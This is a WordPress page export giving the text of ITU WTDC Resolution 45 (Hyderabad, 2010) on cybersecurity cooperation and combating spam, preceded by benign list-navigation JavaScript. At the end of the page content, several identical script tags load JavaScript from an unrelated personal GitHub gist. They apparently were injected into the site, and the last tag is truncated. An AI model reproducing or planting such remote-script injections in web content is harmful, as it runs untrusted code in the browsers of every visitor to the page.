{"id":488,"date":"2013-05-19T00:42:02","date_gmt":"2013-05-19T04:42:02","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=488"},"modified":"2015-06-30T00:08:43","modified_gmt":"2015-06-30T04:08:43","slug":"wtdc_45","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2010\/wtdc_45\/","title":{"rendered":"WTDC Resolution 45"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 45 (Rev. Hyderabad, 2010)<\/span><\/h3>\n<h4><span style=\"\">Mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Hyderabad, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recalling<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)Resolution 45 (Doha, 2006) of the World Telecommunication Development Conference (WTDC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)the noble principles, aims and objectives embodied in the Charter of the United Nations and the Universal Declaration of Human Rights;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)its fundamental support for Programme 3 (e-strategies and ICT-applications), confirming that ITU shall play a leading facilitating role for Action Line C5 in the Tunis Agenda for the Information Society (Building confidence and security in the use of ICTs);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)the cybersecurity-related provisions of the Tunis Commitment and the Tunis Agenda;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)Goal 4 of the strategic plan for the Union for 2008-2011, approved by Resolution 71 (Rev. Antalya, 2006) of the Plenipotentiary Conference, which states that ITU can achieve its overall mission by developing tools,based on contributions from the membership, to promote end-user confidence, and to safeguard the efficiency, security, integrity and interoperability of networks;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)Resolution 130 (Antalya, 2006) of the Plenipotentiary Conference, which resolves to give high priority to the role ofITU in building confidence and security in the use of telecommunications\/information and communication technologies (ICTs);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)the adoption at WTDC (Doha, 2006) of a new Question 22\/1, entitled &#8220;Securing information and communication networks: best practices for developing a culture of cybersecurity&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)  the report of the Chairman of the High-Level Group of Experts (HLEG) of the Global Cybersecurity Agenda (GCA), established by the ITU Secretary-General pursuant to the requirements of Action Line C5 on building confidence and security in the use of ICTs and in accordance with Resolution 140 (Antalya, 2006) of the Plenipotentiary Conference, on the role of ITU as sole facilitator for WSIS Action Line C5, and Resolution 58 (Johannesburg, 2008) of the World Telecommunication Standardization Assembly (WTSA), on encouraging the creation of national computer incident response teams, particularly for developing countries;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)Resolution [COM 3\/9] of this conference, on the creation of national and regional computer incident response teams, particularly for developing countries, and cooperation among them,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)the role of ICTs as effective tools to promote peace, securityand stability and to enhance democracy, social cohesion, good governance and the rule of law, and the need to confront the escalating challenges and growing threats resulting from the abuse of this technology, including for criminal and terrorist purposes, while respecting human rights (see also \u00a7 15 of the Tunis Commitment);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)the need to build confidence and securityin the use of telecommunications\/ICTs by strengthening the trust framework (\u00a7 39 of the Tunis Agenda), and the need for governments, in cooperation with other stakeholders within their respective roles, to develop necessary legislation for the investigation and prosecution of cybercrime, at national, regional and international levels, having regard to existing frameworks, for example: United Nations General Assembly (UNGA) Resolutions 55\/63 and 56\/121 on combating the criminal misuse of information technologies and Resolutions 57\/239, 58\/199 and 64\/211 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures; regional initiatives including, but not limited to, the Council of Europe&#8217;s Convention on Cybercrime (\u00a7 40 of the Tunis Agenda); and international partnerships;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)that UNGA Resolution 64\/211 invites Member States to use, if and when they deem appropriate, the voluntary self-assessment tool that is annexed to the resolution for national efforts;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)the need for Member States to develop national cybersecurity programmes centred around a national plan, public-private partnerships, a sound legal foundation, a watch, warning, response and recovery capability, and a culture of awareness, using as a guide the Report on best practices for a national approach to cybersecurity: building blocksfor organizing national cybersecurity efforts, drawn up under Question 22 of Study Group 1 of the ITU Telecommunication Development Sector (ITU-D);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)that the considerable and increasing losses which users of telecommunication\/ICT systems have incurred from the growing problem of cybercrime and deliberate sabotage worldwide alarm all developed and developing nations ofthe world without exception;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)the reasons behind the adoption of Resolution 37 (Rev. Hyderabad, 2010) of this conference on bridging the digital divide, havingregard to the importance of multistakeholder implementation at the international level and to the action lines referenced in \u00a7 108 of the Tunis Agenda, including &#8220;Building confidence and security in the use of ICTs&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)the outcomes of several ITU activities related to cybersecurity, especially, but not limited to, the ones coordinated by the Telecommunication Development Bureau, in order to fulfil ITU&#8217;s mandate as facilitator for the implementation of Action Line C5 (Building confidence and security in the use of ICTs);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)that Objective 1 of ITU-D, set under the strategic plan for the Union for 2008-2011, approved in Resolution 71 (Rev. Antalya, 2006), is to organize and strengthen cooperation among ITU-D members and between ITU-D and other stakeholders, reflecting the relevant WSIS outcomes;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)that the fact, among others, that criticaltelecommunication\/ICT infrastructures are interconnected at global level means that low infrastructure securityin one country could result in greater vulnerability and risks in others,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recalling further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)the desire and commitment of all concerned to build a people-centred, inclusive and development-oriented information society, premisedon the purposes and principles of the Charter of the United Nations, international law and multilateralism, and respecting fully and upholding the Universal Declaration of Human Rights, so that people everywhere can create, access, utilize and share information and knowledge, in order to achieve their full potential and to attain the internationally agreed development goals and objectives, including the Millennium Development Goals;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)the provisions of \u00a7\u00a7 4, 5 and 55 of the Geneva Declaration of Principles, and the fact that freedom of expression and the free flow of information, ideas and knowledge are beneficial to development;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)that the Tunis phase of WSIS represented a unique opportunity to raise awareness of the benefits that telecommunications\/ICTs can bring to humanity and the manner in which they can transform people&#8217;s activities, interaction and lives, and thus increase confidence in the future,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)  that measures undertaken to ensure the stability and security of ICT networks, to fight cybercrime and to counter spam must protect and respect the provisions for privacy and freedom of expression as contained in the relevant parts of the Universal Declaration of Human Rights (see also \u00a7 42 of the Tunis Agenda);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)the need to take appropriate actions and preventive measures, as determined by law, against abusive uses of ICTs as mentioned in connection with &#8220;Ethical dimensions of the information society&#8221; in the Geneva Declaration of Principles and Plan of Action (\u00a7 43 of the Tunis Agenda), the need to counter terrorism in all its forms and manifestations on ICT networks, while respecting human rights and complying with other obligations under international law, as outlined in operative paragraph 81 of UNGA Resolution 60\/1 on the 2005 world summit outcome, the importance of the security, continuity and stability of ICT networks and the need to protect ICT networks from threats and vulnerabilities (\u00a7 45 of the Tunis Agenda), while ensuring respect for privacy and the protection of personal information and data, whether via adoption of legislation, the implementation of collaborative frameworks, best practices and self-regulatory and technological measures by business and users (\u00a7 46 of the Tunis Agenda);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)the need to effectively confront challenges and threats resulting from use of telecommunications\/ICTs for purposes that are inconsistent with objectives of maintaining international stability and security and may adversely affect the integrity of the infrastructure within States to the detriment of their security, and to work to prevent the abuse of information resources and technologies for criminal and terroristpurposes, while respecting human rights;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)the role of telecommunications\/ICTs in the protection of children and in enhancing their development, and the need to strengthen action to protect children and youth from abuse and defend their rights in the context of telecommunications\/ICTs, emphasizing that the best interests of the child are a key consideration;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)  the desire and commitment of all concerned tobuild a people-centred, inclusive and secure development-oriented information society, premisedon the purposes and principles of the Charter of the United Nations, international law and multilateralism, and respecting fully and upholding the Universal Declaration of Human Rights, so that people everywhere can create, access, utilize and share information and knowledge in complete security, in order to achieve their full potential and to attain the internationally agreed development goals and objectives, including the Millennium Development Goals;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)  the provisions of \u00a7\u00a7 4, 5 and 55 of the Geneva Declaration of Principles, and the fact that freedom of expression and the free flow of information, ideas and knowledge are beneficial to development;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)  that the Tunis phase of WSIS represented a unique opportunity to raise awareness of the benefits that telecommunications\/ICTs can bring to humanity and the manner in which they can transform people&#8217;s activities, interaction and lives, and thus increase confidence in the future, conditional upon the secure use of telecommunications\/ICTs, as the implementation of the Summit outcomes has demonstrated;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)the need to deal effectively with the significant and growing problem posed by spam, as called for in \u00a7 41 of the Tunis Agenda, as well as, inter alia, spam, cybercrime, viruses, worms and denial-of-service attacks, as called for in Goal 4 of the strategic plan in Annex 1 to Resolution 71 (Rev. Antalya, 2006),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)that Resolution 50 (Johannesburg, 2008) ofWTSA, on cybersecurity, and Resolution 52 (Johannesburg, 2008) of WTSA, on countering and combating spam, include the study of technical aspects for reducing the impact of these phenomena;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)the work of Study Group 17 (security) of the ITU Telecommunication Standardization Sector (ITU-T) on public key infrastructures, identity management, digital signatures, the security manual, the security standards roadmap and the cybersecurity information exchange framework;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)that the enormous increase in spam is a significant and growing problem for users, networks and the Internet as a whole, and that the issue of cybersecurity should be addressed at appropriate national, regional and international levels, with the aim ofcombating spam, in particular criminal spam;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)  that the ITU Global Cybersecurity Agenda (GCA) encourages international cooperation aimed at proposing strategies for solutions to enhance confidence and securityin the use of ICTs;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)that cooperation and collaboration among Sector Members contributes to building and maintaining a culture of cybersecurity,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to continue to recognize cybersecurity as one of its priority activities and to continue to address, within its area of core competence, the issue of securing and building confidence in the use of ICTs, by raising awareness, identifying best practices and developing appropriate training material in order to promote a culture of cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to continue to collaborate, cooperate and share information among relevant international and regional organizations on cybersecurity-related initiatives within its areas of competence,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to continue to organize, in conjunction with Programme 2 and based on member contributions, and in collaboration with the Director of the Telecommunication Standardization Bureau, meetings of Member States, Sector Members and other appropriate relevant stakeholders to discuss ways and means to enhance cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to carry out studies on strengthening the cybersecurity of developing countries at regional and universal level, based on a clear identification of their needs, particularly those relating to telecommunication\/ICT use, including the protection of children and youth;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 to support Member States&#8217; initiatives regarding mechanisms for enhancing cooperation on cybersecurity;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4 to assist the developing countries in enhancing their states of preparedness in order to ensure a high and effective level of security for their critical telecommunication\/ICT infrastructures;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5 to assist Member States in the establishment of an appropriate framework between the developing countries allowing rapid response to major incidents, and propose an action plan to increase their protection;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6 to continue to cooperate with the Secretary-General&#8217;s initiative on cybersecurity, and with the other ITU Sectors in accordance with the Bureau&#8217;s mandate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7 to report the results of the implementation of this resolution to the next WTDC,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Secretary-General, in coordination with the Directors of the Radiocommunication Bureau, the Telecommunication Standardization Bureau and the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to work towards the preparation of a document relating to a possible memorandum of understanding (MoU) among interestedMember States, including the legal analysis of the MoU and its scope of application, to strengthen cybersecurity and combat cyberthreats, in order to protect developing countries and any country interested inacceding to this possible MoU, with the outcome of the meeting to be submitted to the Council at its 2011 session for consideration and any action, as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to support IMPACT, FIRST and other global or regional cybersecurity projects, as appropriate, and to invite all countries, particularly developing countries, to take part in its activities,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">requests the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to bring this resolution to the attention of the next plenipotentiary conference for consideration and required action, as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to report the results of these activities to the Council and to the Plenipotentiary Conference in 2014,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1 to provide the necessary support for and participate actively in the implementation of this resolution;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2 to recognize cybersecurity, including countering and combating spam, as a high-priority item and to take appropriate action and contribute to building confidence and security in the use of ICTs at the national and international level;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3 to encourage access providers to protect themselves from the risks identified, guarantee the continuity of services provided and notify security infringements,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to establish an appropriate framework allowing rapid response to major incidents, and propose an action plan to increase their protection.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' 